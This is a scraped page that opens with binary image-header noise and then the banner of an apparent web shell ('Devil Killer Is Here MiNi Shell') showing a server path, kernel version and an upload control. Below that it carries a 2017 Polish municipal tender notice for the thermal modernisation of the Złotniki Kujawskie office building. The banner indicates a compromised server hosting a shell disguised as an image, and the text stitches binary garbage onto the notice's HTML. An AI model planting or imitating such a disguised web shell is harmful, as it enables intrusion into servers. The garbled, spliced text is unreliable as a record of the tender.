JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170228/33224-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.zlotnikikuj.ires.pl' target='_blank'>http://www.zlotnikikuj.ires.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 33224 - 2017
              z dnia 2017-02-28 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Złotniki Kujawskie: Termomodernizacja budynku Urzędu Gminy w Złotnikach Kujawskich<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Europejski Fundusz Rozwoju Regionalnego w ramach Regionalnego Programu    Operacyjnego  Województwa Kujawsko  Pomorskiego na lata 2014-2020, konkurs Nr    RPKP.03.03.00-  IZ.00-04-012/16 w ramach Osi priorytetowej 3. Efektywność energetyczna     i gospodarka  niskoemisyjna w regionie dla Działania 3.3 Efektywność energetyczna w       sektorze  publicznym i mieszkaniowym Schemat: Modernizacja energetyczna budynków    publicznych  w ramach polityki terytorialnej</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Złotniki Kujawskie, krajowy numer identyfikacyjny
              9235080800000, ul.
              ul. Powstańców Wielkopolskich 
              6,
              88180  
              Złotniki Kujawskie, woj.
              kujawsko-pomorskie, państwo
              Polska, tel.
              52 35 17 160, e-mail
              a.taflinska@zlotnikikujawskie.pl, faks
              52 35 17 160 wew. 51.
              <br />
              Adres strony internetowej (URL): www.zlotnikikuj.ires.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.zlotnikikuj.ires.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.zlotnikikuj.ires.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty wykonawcy składają w formie pisemnej za pośrednictwem operatora pocztowego w rozumieniu     ustawy z dnia 23listopada 2012r.  Prawo Pocztowe , osobiście lub za pośrednictwem posłańca.<br />
                Adres:
                <br />Urząd Gminy Złotniki Kujawskie      ul. Powstańców Wielkopolskich 6     88-180 Złotniki Kujawskie     Pokój nr 27  Sekretariat</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Termomodernizacja budynku Urzędu Gminy w Złotnikach Kujawskich<br /><b>Numer referencyjny: </b>271.1.1.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia są roboty budowlane pn.: Termomodernizacja budynku Urzędu Gminy w  Złotnikach Kujawskich"
2.Zakres zamówienia obejmuje:  

2.1.ROBOTY ROZBIÓRKOWE OBEJMUJĄCE
  demontaż tablic informacyjnych, uchwytów do flag, napisów znajdujących się na elewacji  
   budynku, klinkietów,
  rozbiórka izolacji  cieplnej ze styropianu,
  demontaż barierek,
  demontaż stolarki okiennej i parapetów zewnętrznych,
  demontaż stolarki drzwiowej  i bramy garażowej,
  rozebranie podjazdu  i schodów,
  rozebranie rynien i rur spustowych,
  demontaż przewodów uziemiających i odgromowych,
  rozebranie pokrycia dachowego z płyt azbestowo  cementowych,

2.2.STOLARKA
  montaż okien rozwieranych i uchylno  rozwieranych jednodzielnych oraz dwudzielnych z 
    PCV z obróbką  obsadzenia, okleina jednostronna grafit, szyba bezpieczna okno  
    01, 02, 03,04,05,06, 07, 08,09, 010,
  montaż okien rozwieranych i uchylno  rozwieranych jednodzielnych i dwudzielnych z 
    PCV z obróbką obsadzenia, okleina jednostronna grafit, szyba zwykła okno 02,03,04,  
    011,012,013,014, 
  montaż parapetów wewnętrznych z PCV,
  montaż drzwi stalowych szarych, drzwi aluminiowych ciepłe z szybą bezpieczną malowane 
  proszkowo jednostronnie w kol grafit oraz wrota do garażu w kolorze grafit.

2.3. DACH DWUSPADOWY KRYTY GONTEM BLASZANYM 
  wzmocnienie krokwi,
 wykonanie impregnacji ogniochronnej elementów drewnianych,
  ołacenie połaci dachowych łatami 50 x 40,
  przemurowanie kominów cegłą klinkierową pełną grafitową,
  pokrycie dachu gontem blaszanym w kolorze grafitowym wraz z wykonaniem wiatrownic   
    bocznych,
  wykonanie izolacji cieplnej z wełny mineralnej,
  montaż rynien i rur spustowych w kolorze grafitowym

2.4. DACH PŁASKI KRYTY STYROPAPĄ
  przygotowanie podłoża poprzez oczyszczenie,
  jednokrotne gruntowanie emulsją,
  wykonanie izolacji z folii polietylowej,
  krycie dachów styropapą gr 20 cm,
  pokrycie dachu papą termozgrzewalną dwuwarstwowe,
  odpowietrzenie styropapy,
  montaż wywietrzników dachowych,
  wykonanie obróbek blacharskich z blachy stalowej powlekanej

2.5. ORYNNOWANIE I AKCESORIA
  montaż rynien dachowych półokrągłych o średnicy 150 mm z polichlorku winylu,
  montaż rur spustowych okrągłych z PCV o srednicy 120 mm,
  montaż denek przy rynnach dachowych półokrągłych z polichlorku winylu o śr 170 mm,
  montaż lejów spustowych przy rynnach dachowych półokrągłych stalowych,
 montaż kolanek z polichlorku winylu o średnicy  125 mm,
 montaż pasów nadrynnowych , okapów,
 montaż śniegołapów systemowych,
 wykonanie obróbek blacharskich komina, murów ogniowych i miejsc różnicy wysokości, 
   deski czołowej i okapu

2.6.PODCINANIE FUNDAMENTÓW 
      POZIOMA
 odkopanie fundamentów,
 osuszenie fundamentu i ścian cokołu,
 wykonanie podcinki   ściana odcinkami 1,0 m,
 wykonanie izolacji poziomej,
 wbijanie klinów z tworzywa sztucznego
 uzupełnienie fugi zaprawą z dodatkiem środka spęczającego
   PIONOWA PIWNIC
 odbicie tynków,
 oczyszczenie ścierne murów,
 wyrównanie powierzchni masą wyrównawczą,
 gruntowanie podłoża,
 wykonanie izolacji przeciwwilgociowej

2.7.ELEWACJA
      COKÓŁ
 oczyszczenie i zmycie ścian fundamentowych,
 wykonanie tynków cementowych kat.II na ścianach fundamentowych,
 jednokrotne gruntowanie,
 przyklejenie na ścianach fundamentowych styropianu XPS 10 cm,
 wykonanie izolacji pionowej ścian fundamentowych z folii kubełkowej z gruntowaniem 
   powierzchni,
 zasypanie wykopów,
 przyklejenie jednej warstwy siatki na ścianach cokołu i nałożenie podkładowej masy 
   tynkarskiej od mozaikę
 wykonanie tynku mozaikowego
  CZĘŚĆ NADZIEMNA
 zamurowanie otworów okiennych i uzupełnienie zagłębień po otworach styropianem,
 oczyszczenie i zmycie ścian,
 uzupełnienie tynków zewnętrznych,
 jednokrotne gruntowanie emulsją,
 montaż listew startowych,
 docieplenie ścian zewnętrznych styropianem o grubości 14 cm,
  zatopienie warstwy siatki, 
 gruntowanie podłoża,
 wykonanie tynków cienkowarstwowych mineralnych,
 malowanie elewacji farbą silikonową,
 wykonanie obróbek blacharskich z blachy powlekanej  parapety zewnętrzne,
 montaż tablic informacyjnych, uchwytów do flag, napisu /Gmina Złotniki Kujawskie/ i  
   /Urząd Gminy w Złotnikach Kujawskich/,
  renowacja i montaż orła oraz montaż herbu,
 zakup i montaż daszku nad drzwiami wejściowymi ze stali nierdzewnej 1,90 x 0,95 kolor 
   satyna biel,

2.8.ROBOTY ZEWNĘTRZNE
 wykonanie podjazdu dla osób niepełnosprawnych, 
 wyrównanie schodów przy kotłowni i poszerzenie schodów wejściowych,
 przygotowanie podłoża podjazdu dla osób niepełnosprawnych i schodów oraz wykonanie 
   okładziny z płytek antypoślizgowych w kolorze grafitowym,
 wykonanie opaski wokół budynku poprzez wykonanie koryta, ustawienie obrzeży,  
   wykonanie posypki cementowo  piaskowej i wykonaniu nawierzchni z kostki brukowej 
   betonowej o grubości 6 cm,
 wykonanie i montaż balustrad malowanych proszkowo

2.9.ROBOTY ELEKTRYCZNE
      Oświetlenie zewnętrzne
 wykonanie oświetlenia zewnętrznego podświetlenia elewacji budynku poprzez montaż 
   lamp, naświetlaczy i gniazd zewnętrznych bryzgoszczelnych podwójnych,
 oświetlenie zewnętrzne zasilane będzie z istniejącej tablicy rozdzielczej  przewodem 
   YDYżo 3 x 2,5 mm2 
 badanie kabla 3 żyłowego, sprawdzenie i pomiar 1 fazowego obwodu elektrycznego 
   niskiego napięcia, badanie i pomiary instalacji skuteczności zerowania, sprawdzenie 
   samoczynnego wyłączenia zasilania,
     Instalacje odgromowe
 instalację odgromową na dachu wykonać jako zwody poziome niskie z drutu stalowego   
   ocynkowanego  8. Zwody na dachu należy mocować  za pomocą wsporników  
   dystansowych w odległości nie mniejszej niż 2 cm od powierzchni dachu, odległość  
   pomiędzy wspornikami nie może być większa niz 0,5 m, oko z siatki wykonane ze zwodów 
   poziomych niskich nie może być  większe niż 20 m x 10 m,
 przewody odprowadzające i uziemniające, sztuczne przewody odprowadzające należy 
   wykonać z drutu stalowego ocynkowanego  8, przewody odprowadzające należy  
   instalować min 2 cm od ściany za pomocą wsporników dystansowych / dopuszczalne jest  
   także mocowanie bezpośrednio na ścianie/, odległość między wspornikami nie może być 
   większa niż 1,0 m, przewody odprowadzające powinny być prowadzone wzdłuż prostych i 
   pionowych tras po możliwie najkrótszej drodze  pomiędzy zwodem a przewodem 
   uziemiającym,
 połączenia przewodów odprowadzających z przewodem uziemiającym należy  wykonać za 
   pomocą zacisków pobierczych, usytuowanych pomiędzy przewodem odprowadzającym  a   
   uziemiającym na wysokości 0,3  1,8 mod powierzchni ziemi, zaciski pobiercze powinny  
   mieć co najmniej 2 śruby zaciskowe M6 lub M10  należy je umieszczać i osłaniać w taki  
   sposób, aby były łatwo dostępne dla potrzeb okresowych kontroli oraz pomiaru rezystancji. 
   Część nadziemną przewodów uziemiających należy układać na zewnętrznych 
   powierzchniach ścian obiektu i chronić przed uszkodzeniami mechanicznymi przy użyciu 
   osłon do wysokości 1,5 m od powierzchni ziemi i do głębokości 0,2 m w ziemi,
 przewody uziemiające należy wykonać z bednarki stalowo ocynkowanej,
 złącza kontrolne należy ponumerować,
 badanie instalacji odgromowej,
 wykonanie pomiaru uziemienia

3.0.ROBOTY BRANŻY SANITARNEJ
     
 Instalacja ciepłej wody użytkowej
 przygotowanie ciepłej wody użytkowej odbywać się będzie poprzez montaż  
   podgrzewacza ciepłej wody użytkowej o pojemności 120 l z wężownicą spiralną,  
   posiadający wbudowaną grzałkę elektryczną, zainstalowanie w pomieszczeniu 
   kotłowni,instalację c.w.u. wykonać z rur PP stabilizowanych, 
     
Instalacja centralnego ogrzewania
 do zasilenia projektowanej instalacji centralnego ogrzewania należy wykorzystać istniejący 
   kocioł na paliwo stałe posadowiony w pomieszczeniu kotłowni,
 projektuje się ogrzewanie tradycyjne dwururowe z rozprowadzeniem dolnym przewodów w 
   warstwie wylewki, jako przewody przewidziano rury z tworzywa polipropylenowe  
   stabilizowane przewidziane do pracy ciągłej przy temperaturze maks. 80°C o połączeniach 
   zgrzewanych i skręcanych,
 jako elementy grzejne przewidziano grzejniki stalowe płytowe z zaworami 
   termoregulacyjnymi na zasilaniu i zaworami odcinającymi na powrocie,
 odpowietrzenie instalacji c.o. odpowietrznikami automatycznymi zabudowanymi w 
   najwyższych punktach instalacji,
 odpowietrzniki z zaworem odcinającym i lokalnie przy grzejnikach, które posiadają 
   wbudowane zawory odpowietrzające,
 instalację centralnego ogrzewania zaprojektowano jako dwururową  o parametrach pracy 
   80/60 o C, przewody poprowadzić  od kotła do rozdzielaczy rurowych a następnie poprzez 
   szafki rozdzielaczowe do grzejników,
 sieć rozdzielczą należy izolować otuliną  o grubości izolacji 2 cm,
 po zakończeniu prac montażowych należy przeprowadzić próbę ciśnieniową na zimno i 
   próbę szczelności na gorąco

Instalacja fotowoltaiczna
 w skład instalacji fotowoltaicznej wchodzi 16 paneli fotowoltaicznych o mocy 250 W  
   oraz 1 szt inwerter, licznik energii,

 zadaniem instalacji fotowoltaicznej jest wytworzenie energii elektrycznej o parametrach  
   sieci elektroenergetycznej a następnie wpuszczenie jej do istniejącej instalacji wewnętrznej 
  budynku, energia ta wykorzystywana będzie na własne potrzeby do ogrzewania ciepłej wody 
  użytkowej.

3.1.Szczegółowy zakres zamówienia  zawiera:
Szczegółowy zakres zamówienia zawiera dokumentacja projektowa  , specyfikacja techniczna wykonania i odbioru robót , wymagania zawarte w specyfikacji istotnych warunków zamówienia (siwz), natomiast przedmiar robót jest  jedynie elementem pomocniczym dla Wykonawcy.
<br /><br /><b>II.5) Główny kod CPV: </b>45210000-2<br /><b> Dodatkowe kody CPV:</b>45261000-4,
                45421000-4,
                45330000-9,
                45310000-3,
                45100000-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/05/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                zamawiający  nie określa żadnych warunków udziału w tym zakresie,<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wymagane jest posiadanie  przez wykonawcę ubezpieczenia od odpowiedzialności cywilnej w 
         zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną w 
         wysokości minimum 300 000,0 PLN (słownie: trzysta tysięcy złotych 00/100).

<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                         - warunek zostanie spełniony jeżeli Wykonawca wykaże, że  w okresie ostatnich pięciu lat przed 
           upływem terminu składania ofert, a jeżeli okres prowadzenia  działalności jest krótszy - w tym 
           okresie,  wykonał należycie zgodnie z przepisami prawa budowlanego i prawidłowo ukończył co 
           najmniej trzy roboty budowlane obejmujące swym  zakresem  termomodernizację  obiektów ( tj.  
           roboty dociepleniowe, roboty elewacyjne)   o kubaturze nie mniejszej niż 1000 m3 każda,

         - warunek zostanie spełniony jeżeli Wykonawca wykaże , że dysponuje osobami (1 osobą w każdej  
       specjalności), które skieruje do realizacji zamówienia, gwarantującymi właściwą jakość robót budowlanych, 
o kwalifikacjach zawodowych niezbędnych do wykonania zamówienia, nie mniejszych niż określone poniżej, tj.:
a)	kierownika budowy:
minimalne kwalifikacje zawodowe:
posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności
konstrukcyjno  budowlanej bez ograniczeń,
b)	kierownika robót sanitarnych
minimalne kwalifikacje zawodowe:
posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności
 w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych bez ograniczeń,
c)	kierownika robót elektrycznych
minimalne kwalifikacje zawodowe:
posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, 

Wymienione wyżej osoby odpowiedzialne za kierowanie budową lub kierowanie robotami budowlanymi winny posiadać uprawnienia do pełnienia samodzielnej funkcji technicznej w budownictwie, wymagane przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (t. jedn. Dz. U. z 2015 r., poz. 290) i Rozporządzenia Ministra Infrastruktury Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. 2014 r. poz. 1278) lub inne odpowiednie wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające im uprawnienia budowlane, które zostały wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art.12a oraz innych przepisów ustawy z dnia 7 lipca 1994r. Prawo Budowlane oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r., poz. 65). 

<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej,  
    jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku  
    podstaw  wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy,

2) oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej grupy   
    kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć  
    wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że  powiązania z innym  
    wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.
</div><b>
